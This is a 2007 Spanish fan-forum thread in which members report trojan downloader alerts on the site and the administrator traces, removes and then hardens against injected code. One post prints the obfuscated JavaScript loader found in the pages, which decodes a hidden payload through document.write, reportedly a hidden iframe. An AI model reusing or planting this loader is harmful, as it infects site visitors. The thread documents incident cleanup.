En los últimos días, al entrar en el foro desde dos ordenadores distintos y en dos domicilios distintos, dos antivirus distintos (Norton y Kasperski) han detectado y anulado dos virus.
Os ha pasado a alguno más algo así? :?
A mí, lo que me sale al poner la página principal, es "error en módulo" y me aparece dos veces... Además siempre tengo que meter mi nick y contraseña para ingresar en el Foro, cosa que no me pasaba antes... :?
A mí también me pasa con el McAfee, que detecta un troyano, tanto con el Internet explorer como con el Mozilla Firefox. Esto sólo me pasa cuando me conecto a este foro, hasta ahora no me había pasado con ninguna otra página web.
Navego con Opera, y no he tenido problemas.
Yo entro siempre al índice del foro, no a través de la web y no tengo problemas.
En cualquier caso habría que revisar la portada del sitio para chequear que todo esté limpio y no se haya colado algún spyware.
De uso obligado es el programa SpywareBlaster, es simple y actua como inmunizador de cualquier componente malicioso que quiera instalarse sin permiso.
http://www.latiapascuala.com/smf/index.php?topic=5396.0
Cita de: Cronoß en 27 de Junio de 2007, 03:04:14 AM
Navego con Opera, y no he tenido problemas.
Espero que sea con Madame Butterfly :-D
El virus es el Tío and Tía, seguro :evil:
A mi se me abre el windows defender desde hace un par de dias.
¿Por casualidad habeis ejecutado un control 'Active X' cuando accediais al foro?
...
También es posible que vuestro Internet Explorer esté infectado con un 'javascript' y cada vez que accedais a una dirección en favoritos o almacenada en la barra de direcciones se ejecute...
Borrar de vez en cuando los archivos temporales de internet...
Cita de: Ñáñaro en 27 de Junio de 2007, 09:07:14 AM
http://www.latiapascuala.com/smf/index.php?topic=5396.0
Mis disculpas. No había leído ese post... :|
Cita de: Guillermo de Dhalgrencia.doc en 27 de Junio de 2007, 03:59:54 PM
También es posible que vuestro Internet Explorer esté infectado con un 'javascript' y cada vez que accedais a una dirección en favoritos o almacenada en la barra de direcciones se ejecute...
Borrar de vez en cuando los archivos temporales de internet...
Para quitar cualquier posible basurilla es bueno pasarle el CCleaner después de navegar por internet, además como buena medida de seguridad no conviene almacenar las contraseñas en el navegador si dejamos los archivos temporales sin borrar.
P.D : Es evidente que los que tienen este problema en el foro es
por no visitar páginas decentes :-D :-D :-D :-D
Igual es el sistema de estadísticas.
Luego lo desactivo a ver si es eso
He encontrado un código extraño. Lo he deshabilitado.
Probad ahora a ver.
Na, a mí me sigue saliendo el aviso de VirusScan.
Es que me acabo de cargar este cacoh de código:
<!-- o65 --><script language=JavaScript>function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,23,43,57,53,54,17,35,20,46,0,0,0,0,0,0,44,24,30,14,15,1,56,21,37,49,3,16,52,36,38,22,62,48,41,19,28,50,7,11,40,12,33,0,0,0,0,9,0,51,42,6,60,45,55,18,13,10,25,2,58,26,29,59,32,8,34,27,4,61,47,5,39,31,0);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("jUdQ1SYUz1X41sYNV5TL61uxibXUVVYfWCYHEJTUW9YQ62FUKyerO1erYvTQzfurGfT4VOXLYVTLh7_HGOFIiynQzyhNGOAaza@QhVhN8OjZOVhf_JYNVChaOadIYxYa6auxhaTQEJdUV9jNiUdQ1SYUzv_")</script><!-- c65 -->
Es raro, en teoría el código de la web está limpio...
He eliminado el historial y todas las cookies, etc, cerrado y abierto el navegador (IE7) y me sigue dando el mismo error. ¿le sigue dando a alguien más? si sólo quedo yo, pues es cosa mia :|
Cita de: Ñáñaro en 28 de Junio de 2007, 12:37:54 AM
He eliminado el historial y todas las cookies, etc, cerrado y abierto el navegador (IE7) y me sigue dando el mismo error. ¿le sigue dando a alguien más? si sólo quedo yo, pues es cosa mia :|
La verdad es que el script queme he cepillado tenía una pinta horrorosa... algo encriptado...
A ver si pillo un rato este finde y hago una actualización completa de Wordpress
Saludos!
¿Tendrá algo que ver el mismo tipo que quería joder el FTP de FERNANDO BAZO? ¿Será una venganza por putear el "Tèo & Tèa?...
Mi antivirus lo detecta, y no jode mas...
Veo que hay una actualización de seguridad del software del foro. Data del 24 de Junio :-o
Será cosa de instalarla. A ver si esta tarde me dejan tranquilo y puedo ponerme a ello. Lo mismo debería hacer con el Wordpress que usamos para portada :-(
Mucho curro, mucho curro :-D
De mientras sería bueno que los qeu tengan problemas que lo comenten tanto como puedan aquí aportando detalles como tipo de error, página donde aparece, etc... lo digo de cara a investigar un poco el asunto.
Saludos!
A mí me sigue apareciendo. Sencillamente se abre un aviso del Norton y te dice que lo ha neutralizado. Es el mismo "Downloader" del que han hablado otros foreros. Sale justo al entrar en el foro y no vuelve a aparecer en toda la sesión. Si sales y vuelves a entrar vuelve a aparecer.
Cita de: SyntheticMan en 28 de Junio de 2007, 04:47:58 PM
A mí me sigue apareciendo. Sencillamente se abre un aviso del Norton y te dice que lo ha neutralizado. Es el mismo "Downloader" del que han hablado otros foreros. Sale justo al entrar en el foro y no vuelve a aparecer en toda la sesión. Si sales y vuelves a entrar vuelve a aparecer.
Entrando directamente al foro o pasas antes por portada?
Cita de: Josmitar en 28 de Junio de 2007, 06:30:26 PM
Cita de: SyntheticMan en 28 de Junio de 2007, 04:47:58 PM
A mí me sigue apareciendo. Sencillamente se abre un aviso del Norton y te dice que lo ha neutralizado. Es el mismo "Downloader" del que han hablado otros foreros. Sale justo al entrar en el foro y no vuelve a aparecer en toda la sesión. Si sales y vuelves a entrar vuelve a aparecer.
Entrando directamente al foro o pasas antes por portada?
porlomenos a mi, entrando directamente a la tia pascuala :-)
A mi me aparece tanto si entro a la portada como al foro. VirusScan de McFee me detecta JS/Downloader-AUD como archivo de comandos ejecutado por iexplorer.exe. Si minimizo la ventanita del aviso pues así se queda, pero si la cierro, cada vez que actualizo la pantalla, o entro en un enlace me vuelve a aparecer.
Efectivamente, parece que se ejecuta una especie de código malicioso al final del código del foro. Además si borro dicho código se regenera solito.
Eso sucede tanto en portada como en el foro :-o
Si miráis el código fuente lo veréis, está justo al final. Se trata del mismo código que indiqué antes, sólo que por mucho que lo borre vuelve a aparecer.
Creo que tendré un fin de semana (aún más) movidito, y espero tenerlo listo antes del lunes ya que a partir de esa fecha mi jornada laboral va a ser de 12-13 horas..................
A mi también me ha pasado en distintos ordenadores, no molesta mucho porque sólo aparece una vez al principio, y a mí no siempre, según le dé. El otro día el protector del ordenador de mi cuñao, en casa de mi hermana, sí se puso pesao y se me abría cada 30 segundos.
Prueben ahora ver :)
Nota: aún no he actualizado nada :P pero gracias a un consejillo de Ummo he hecho una prueba que espero prospere.
¡¡¡OK!!! De momento va bien. ¡¡¡Gracias!!! :-)
Yo entro siempre a través de portada... y hoy no ha habido nada raro. Arreglado, pues?
Los masters, los masters, los masters son cojonudos... como los masters, no hay "ningunos" :-D
Ya no apar4ece el troyano que indicaba el VSenterprise
Holas!
Está arreglado pero ahora mismo no puedo editar el archivo índice si no es con un pequeño comando (es que está el archivo protegido contra escritura).
He hecho lo siguiente, que abre la edición del archivo al usuario 'maec' (es decir, a mí).
Citar
[dingdong]$ ls -l index.php
-r--r--r-- 1 maec pg609955 14755 Jun 28 14:36 index.php
[dingdong]$ chmod u+w index.php
[dingdong]$ ls -l index.php
-rw-r--r-- 1 maec pg609955 14755 Jun 28 14:36 index.php
Si tras hacer esto veis que el virus vuelve a aprecer (en realidad no hacía nada, sólo abrir un iframe de 0 píxeles) me avisais.
Nada,a mi cada vez que entro a la página,según le dá el volunto,se me cierra antes o despues,me sale la ventanita de Window que dice que Iexplore a detectado un problema y debe cerrarse.Y a volver a entrar :x
Ya me lleva pasando unos dias,pero es que no me habia dado cuenta de este Post,y yo lo achacaba a algún trojano que se me hubiera metido de una pagina de esas porno en las que te metes sin querer :roll: :roll: :-D
jajaja, pues, a mi , ya sin problemas! :wink:
Cita de: Equinoxe en 30 de Junio de 2007, 01:11:57 PM
Nada,a mi cada vez que entro a la página,según le dá el volunto,se me cierra antes o despues,me sale la ventanita de Window que dice que Iexplore a detectado un problema y debe cerrarse.Y a volver a entrar :x
Huy eso me sirvió a mi de excusa para reformatear el ordenador y poner e Windows XP Home Edition que me va de maravilla a lo mejor Equinoxe te toca.........:-D
Cita de: Equinoxe en 30 de Junio de 2007, 01:11:57 PM
Ya me lleva pasando unos dias,pero es que no me habia dado cuenta de este Post,y yo lo achacaba a algún trojano que se me hubiera metido de una pagina de esas porno en las que te metes sin querer :roll: :roll: :-D
Si es verdad, esas páginas porno que metes su página de forma errónea y se te carga otra jode un monton y te dejan regalitos :-D :lol::lol::wink:
Cita de: Manu1613 en 04 de Julio de 2007, 07:53:54 PM
Cita de: Equinoxe en 30 de Junio de 2007, 01:11:57 PM
Nada,a mi cada vez que entro a la página,según le dá el volunto,se me cierra antes o despues,me sale la ventanita de Window que dice que Iexplore a detectado un problema y debe cerrarse.Y a volver a entrar :x
Huy eso me sirvió a mi de excusa para reformatear el ordenador y poner e Windows XP Home Edition que me va de maravilla a lo mejor Equinoxe te toca.........:-D
Cita de: Equinoxe en 30 de Junio de 2007, 01:11:57 PM
Ya me lleva pasando unos dias,pero es que no me habia dado cuenta de este Post,y yo lo achacaba a algún trojano que se me hubiera metido de una pagina de esas porno en las que te metes sin querer :roll: :roll: :-D
Si es verdad, esas páginas porno que metes su página de forma errónea y se te carga otra jode un monton y te dejan regalitos :-D :lol::lol::wink:
:-D :-D :-D
Cita de: Equinoxe en 04 de Julio de 2007, 09:00:17 PM
Cita de: Manu1613 en 04 de Julio de 2007, 07:53:54 PM
Cita de: Equinoxe en 30 de Junio de 2007, 01:11:57 PM
Nada,a mi cada vez que entro a la página,según le dá el volunto,se me cierra antes o despues,me sale la ventanita de Window que dice que Iexplore a detectado un problema y debe cerrarse.Y a volver a entrar :x
Huy eso me sirvió a mi de excusa para reformatear el ordenador y poner e Windows XP Home Edition que me va de maravilla a lo mejor Equinoxe te toca.........:-D
Cita de: Equinoxe en 30 de Junio de 2007, 01:11:57 PM
Ya me lleva pasando unos dias,pero es que no me habia dado cuenta de este Post,y yo lo achacaba a algún trojano que se me hubiera metido de una pagina de esas porno en las que te metes sin querer :roll: :roll: :-D
Si es verdad, esas páginas porno que metes su página de forma errónea y se te carga otra jode un monton y te dejan regalitos :-D :lol::lol::wink:
:-D :-D :-D
Hombre es que si metes una en la cual estas viendo a chicas como la nipona que tienes y que derrepente se te cuele por ahi que se yo a Sara Montiel pues.......... :lol: :lol:
A ver... Que levante la mano aquel que tenga una carpeta por nombre 'escondido' en el disco duro...
...
¿Nadie, eh?
...
Si es que soy original hasta para eso...
:-D :-D :-D
Cita de: Guillermo de Dhalgrencia.doc en 04 de Julio de 2007, 10:12:39 PM
A ver... Que levante la mano aquel que tenga una carpeta por nombre 'escondido' en el disco duro...
...
¿Nadie, eh?
...
Si es que soy original hasta para eso...
:-D :-D :-D
Es mejor esconder una carpeta en el directorio WINDOWS
Cita de: Ñáñaro en 04 de Julio de 2007, 10:16:54 PM
Es mejor esconder una carpeta en el directorio WINDOWS
Ya... Pero cuando llegan los suegros cotillos y necesitas pulsar el botón de 'AUTODESTRUCCIÓN DE MATERIAL QUE PUEDE COMPROMETER SU REPUTACIÓN', te cargas el sistema operativo...
:-D :-D :-D
Cita de: Guillermo de Dhalgrencia.doc en 04 de Julio de 2007, 10:12:39 PM
A ver... Que levante la mano aquel que tenga una carpeta por nombre 'escondido' en el disco duro...
...
¿Nadie, eh?
...
Si es que soy original hasta para eso...
:-D :-D :-D
Tu Bender está levantando la mano :-D :lol:
Cita de: Guillermo de Dhalgrencia.doc en 04 de Julio de 2007, 10:22:45 PM
Cita de: Ñáñaro en 04 de Julio de 2007, 10:16:54 PM
Es mejor esconder una carpeta en el directorio WINDOWS
Ya... Pero cuando llegan los suegros cotillos y necesitas pulsar el botón de 'AUTODESTRUCCIÓN DE MATERIAL QUE PUEDE COMPROMETER SU REPUTACIÓN', te cargas el sistema operativo...
:-D :-D :-D
Por eso está en el directorio WINDOWS, ahí no mira nadie nunca.
Cita de: Ñáñaro en 04 de Julio de 2007, 10:33:31 PMPor eso está en el directorio WINDOWS, ahí no mira nadie nunca.
¿Tú tienes suegros que fueron al cursillo de informática de 10 horas del INSERSO?
...
...
Qué suerte...
:-D :-D :-D
Me sigue saliendo el virus al entrar por la portada.
Y a mí... :cry:
Instálense el inmunizador SpywareBlaster o activen la opción "inmunizar" del Spybot-Search & Destroy , seguro que es algún active X que se ejecuta al ingresar por la portada.
Se pueden descargar el SpywareBlaster y el Spybot-Search & Destroy de acá:
http://www.infospyware.com/Anti-Spywares.htm
Estos programas son igual de necesarios que los antivirus
:wink:
yo uso el A2 Squared, AVG 7.5,Spy Bot Search & Destroy,Ad-adware Personal SE, clean up,ccleaner
La prueba del algodón superada :-D (me gustaba más el spy sweeper pero caduca pronto)
Cita de: Manu1613 en 06 de Julio de 2007, 02:08:31 AM
yo uso el A2 Squared, AVG 7.5,Spy Bot Search & Destroy,Ad-adware Personal SE, clean up,ccleaner
La prueba del algodón superada :-D (me gustaba más el spy sweeper pero caduca pronto)
Y funciona bién??tio enviamelo por privado,y te mando unas fotitos de la chinita esta :roll: :-D :-D
Cita de: Equinoxe en 06 de Julio de 2007, 02:56:34 PM
Cita de: Manu1613 en 06 de Julio de 2007, 02:08:31 AM
yo uso el A2 Squared, AVG 7.5,Spy Bot Search & Destroy,Ad-adware Personal SE, clean up,ccleaner
La prueba del algodón superada :-D (me gustaba más el spy sweeper pero caduca pronto)
Y funciona bién??tio enviamelo por privado,y te mando unas fotitos de la chinita esta :roll: :-D :-D
Buuuuuuuuuu buuuuuuuuuuuuuuu chantaje :lol::lol::lol:
Bueno, pues al final me ha tocado a mi también. Desde ayer cuando accedo al foro desde la portada, el Kasperky (actualizado) me da que hay un archivo que contiene el troyano Trojan Downloader.JS.Agent.hr y que puede ser desinfectado.
He borrado los temporales, he pasado el Spy-boot e inmunizado , el Lavasoft-ad-aware... y nada de nada.
Muy raro todo esto.
¡¿Siguen aquí los troyanos jarreros?! :?
Cita de: MR. ROBOTO en 27 de Agosto de 2007, 07:04:30 PM
¡¿Siguen aquí los troyanos jarreros?! :?
No lo sé, es que se metieron en muchos sitios y parece que no hice limpieza del todo. Ya me cargué el último reportado y parece que actualmente no hay nada.
A ver lo que dura :-D
Cita de: Josmitar en 27 de Agosto de 2007, 09:28:05 PM
Cita de: MR. ROBOTO en 27 de Agosto de 2007, 07:04:30 PM
¡¿Siguen aquí los troyanos jarreros?! :?
No lo sé, es que se metieron en muchos sitios y parece que no hice limpieza del todo.
Eso pasa por dejar lo barrido bajo la alfombra.
Cita de: ZZERO en 27 de Agosto de 2007, 10:27:36 PM
Cita de: Josmitar en 27 de Agosto de 2007, 09:28:05 PM
Cita de: MR. ROBOTO en 27 de Agosto de 2007, 07:04:30 PM
¡¿Siguen aquí los troyanos jarreros?! :?
No lo sé, es que se metieron en muchos sitios y parece que no hice limpieza del todo.
Eso pasa por dejar lo barrido bajo la alfombra.
Pos si :D
Y por irme de vacaciones s sitios sin conexión a internet 8-)
En estos momentos funcionando perfectamente. Gracias jefe :-D
Cita de: Josmitar en 27 de Agosto de 2007, 11:45:56 PM
Cita de: ZZERO en 27 de Agosto de 2007, 10:27:36 PMEso pasa por dejar lo barrido bajo la alfombra.
Pos si :D
Y por irme de vacaciones s sitios sin conexión a internet 8-)
Cuñu, no jodas que estuviste de vacaciones en casa de JARRE... Bueno, como él nunca entra en foros de sus fans ni ná de ná es de entender que no tiene internete... :-D
:-D :-D :-D :-D
Bueno, en principio pareced que tenemos el tema de los hackers controlado. He modificado todas las cuentas de usuario para que sólo puedan acceder por ftp seguro (sftp). Eso es debido a que el protocolo ftp normal envía las contraseñas como texto plano, de manera que éstas pueden ser interceptadas por elementos hostiles.
Una vez hecho todo esto, he preocedido a cambiar las contraseñas de todos los usuarios por otra nueva (ya se ha comunicado esto a todos).
En teoría con esto no debería haber mas problemas, ya que según nos comentaron los chicos de Dreamhost, habían accesos por ftp desde Indonesia que... evidentemente... no eran lícitos :P
Pues eso, a la que suceda cualquier cosa y lo notéis mavisais, que no lo veo mu claro aún :P
Saludos!
Cita de: Josmitar en 09 de Septiembre de 2007, 05:11:38 PMUna vez hecho todo esto, he preocedido a cambiar las contraseñas de todos los usuarios por otra nueva (ya se ha comunicado esto a todos).
Con "todos los usuarios" te refieres a todos los foreros? lo digo porque yo no he recibido nada. Sigo entrando como siempre pero porque tengo activada la opción de recordar mi contraseña automáticamente.
Cita de: SyntheticMan en 09 de Septiembre de 2007, 05:23:12 PM
Cita de: Josmitar en 09 de Septiembre de 2007, 05:11:38 PMUna vez hecho todo esto, he preocedido a cambiar las contraseñas de todos los usuarios por otra nueva (ya se ha comunicado esto a todos).
Con "todos los usuarios" te refieres a todos los foreros? lo digo porque yo no he recibido nada. Sigo entrando como siempre pero porque tengo activada la opción de recordar mi contraseña automáticamente.
Yo tampoco he recibido nada, pero sigo entrando normalmente... :?
Creo que el Oh, Gran Master se refiere a quienes tienen acceso al FTP de FJARRE, no a los usuarios del Foro o la Web.
Eso, a los usuarios con acceso por FTP, que semos 3 ó 4 a lo sumo, cada uno en sus respectivos dominios. 8-)